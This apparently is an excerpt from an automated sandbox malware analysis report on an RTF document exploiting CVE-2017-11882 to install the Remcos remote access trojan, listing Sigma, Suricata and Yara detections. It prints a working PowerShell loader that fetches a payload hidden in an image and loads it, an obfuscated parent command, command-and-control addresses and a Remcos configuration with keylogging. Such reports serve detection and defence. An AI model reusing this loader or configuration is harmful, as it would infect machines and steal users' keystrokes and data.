$imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3536, TargetFilename: C:\Users\user\AppData\Local\Temp\r5trqahy.yze.ps1

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: B4 3D DD D1 91 B0 DF CC FB 95 F6 2E 53 37 48 40 98 D2 05 4C 75 58 AB 79 F1 76 B7 EE DC 24 90 16 0A D8 D8 04 61 CC 41 2E AB 49 20 6E A3 7F 5E D8 D7 08 E5 34 45 93 AC E7 03 C0 1F EF 25 8A 6D B3 4E 09 88 35 56 DA 3E BA 49 A0 77 E9 E2 4C 1F C3 B6 5A 68 F4 78 72 B9 A7 2B 6B 60 17 2C D7 B9 45 01 31 01 95 E2 79 03 38 AB FD 5A 91 10 74 24 2B 4F 86 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3752, TargetObject: HKEY_CURRENT_USER\Software\Rmc-O0U3JA\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-11T20:22:24.732832+020020204231Exploit Kit Activity Detected45.90.89.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-11T20:22:24.732832+020020204251Exploit Kit Activity Detected45.90.89.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-11T20:22:29.656144+020020365941Malware Command and Control Activity Detected192.168.2.224916445.90.89.988243TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-11T20:22:23.606116+020020490381A Network Trojan was detected207.241.227.96443192.168.2.2249162TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-11T20:22:31.383018+020028033043Unknown Traffic192.168.2.2249165178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: xnHel.rtfAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Found malware configuration
                Source: 9.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "45.90.89.98:8243", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for submitted file
                Source: xnHel.rtfReversingLabs: Detection: 47%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                Source: powershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_11993e3b-7

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Found potential equation exploit (CVE-2017-11882)
                Source: Static RTF information: Object: 0 Offset: 00006C87h
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 45.90.89.123 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drStream path '_1787569685/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drStream path '_1787569720/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
